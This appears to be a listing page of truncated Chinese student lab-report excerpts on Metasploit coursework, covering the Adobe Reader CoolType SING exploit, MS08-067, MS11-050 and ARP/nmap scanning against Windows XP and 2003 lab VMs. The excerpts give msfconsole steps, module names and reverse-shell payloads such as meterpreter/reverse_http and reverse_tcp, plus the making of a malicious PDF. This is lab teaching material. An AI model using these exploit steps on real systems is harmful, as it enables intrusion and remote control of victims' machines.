20145333茹翔 Exp5 Adobe阅读器漏洞攻击 实验过程 主机为kali的ip地址为:192.168.1.111.靶机windows xp 的ip地址为:192.168.1.110 使用命令msfconsole进入控制台 根据自己的需求选择攻击模块,将其载入(这里选用windows/fileformat/adobe_cooltype_sing),可以使用info命令查看模块的基本信息,以及参数要求,使用命令为 use windows/fileformat/adobe_cooltype_…
20145322 Exp5 Adobe阅读器漏洞攻击 实验过程 IP:kali:192.168.1.102 windowsxp :192.168.1.119 msfconsole进入控制台 使用命令为 use windows/fileformat/adobe_cooltype_sing进入攻击模块 设置攻击载荷payloads ,命令为set payloads windows/meterpreter/reverse_http 使用命令show options来确定需要修改的参数. 使用命令exp…
20145335郝昊<网络攻防>Exp4 Adobe阅读器漏洞攻击 实验内容 初步掌握平台matesploit的使用 有了初步完成渗透操作的思路 本次攻击对象为:windows xp sp3 / Adobe 9.3 主机为kali的ip地址为:192.168.199.220.靶机windows xp 的ip地址为:192.168.199.137 实验步骤 使用命令msfconsole进入控制台 根据自己的需求选择攻击模块,将其载入(这里选用windows/fileformat/adobe_co…
20145333茹翔 Exp5 MS08_067漏洞测试 实验过程 IP:kali:192.168.31.177.windows 2003 :192.168.31.223 使用命令msfconsole进入控制台,可以使用search ms08_067查看相关信息. 得到相应模块名之后,我们使用该模块,使用 show payloads ,确定攻击载荷. 使用命令 use exploit/windows/smb/ms08_067_netapi set payload generic/shell_re…
20145333茹翔 Exp5 MSF基础应用 实验内容 掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路. 一个主动攻击,如ms08_067; 一个针对浏览器的攻击,如ms11_050: 一个针对客户端的攻击,如Adobe 成功应用任何一个辅助模块. 实验链接 实验一主动攻击:ms08_067 实验二针对浏览器:ms11_050 实验三针对客户端:Adobe漏洞攻击 实验四应用辅助模块:利用nmap扫描 实验问答 什么是exploit.payload.encode expl…
20145333茹翔 Exp5 MS11_050 实验过程 使用命令msfconsole命令进入控制台 使用命令search ms11_050查看针对MS11_050漏洞的攻击模块 确定相应模块名之后,我们使用该模块.使用命令 use exploit/windows/browser/ms11_050_mshtml_cobjectelement进入模块 使用命令info查看该模块的具体信息 设置paylaods,我们选择了windows/meterpreter/reverse_http该paylo…
20145333茹翔 Exp5 利用nmap扫描 实验过程 首先使用命令创建一个msf所需的数据库 service postgresql start msfdb start 使用命令msfconsole开启msf 输入命令 use auxiliary/scanner/discovery/arp_sweep进入模块 用show options查看需要设置的消息 根据显示的消息进行设置,设置相关参数 使用命令run开启扫描,结果如下 使用命令nmap+ip地址(该ip地址为同网段下另一个电脑主机ip…
实验环境:Kali 2.0+Windows XP+Adobe Reader 9.3.0 类别:缓冲区溢出 描述:这个漏洞针对Adobe阅读器9.3.4之前的版本,一个名为SING表对象中一个名为uniqueName的参数造成缓冲区溢出. msfconsole 启动Metasploits search cooltype_sing 搜索Adobe阅读器漏洞(adobe_cooltype_sing)相关模块 use exploit/windows/fileformat/adobe_cooltype_s…
Adobe阅读器渗透攻击 实验前准备 1.两台虚拟机,其中一台为kali,一台为windows xp sp3(老师给的xp虚拟机winxpAttaker,密码:mima1234). 2.设置虚拟机网络为NAT模式,保证两台虚拟机可以ping通. 3.kali下打开显示隐藏文件,如下图,先打开主文件夹,在右上角打开如下图所示位置: 实验步骤: 1.在kali终端中开启msfconsole. 2.输入命令use exploit/windows/fileformat/adobe_cooltype_si…
20145211<网络渗透>Adobe阅读器渗透攻击 实验准备 1.用了一个kali,一个English Winxp3,并保证能相互ping通 2.开启显示隐藏文件 实验步骤: 1.开启msfconsole. 2.使用漏洞use exploit/windows/fileformat/adobe_cooltype_sing,进入该漏洞模块的使用. 3.使用攻击载荷 windows/meterpreter/reverse_tcp设置攻击有效载荷. 4.查看参数,并配置,生成hzy.pdf,将pdf…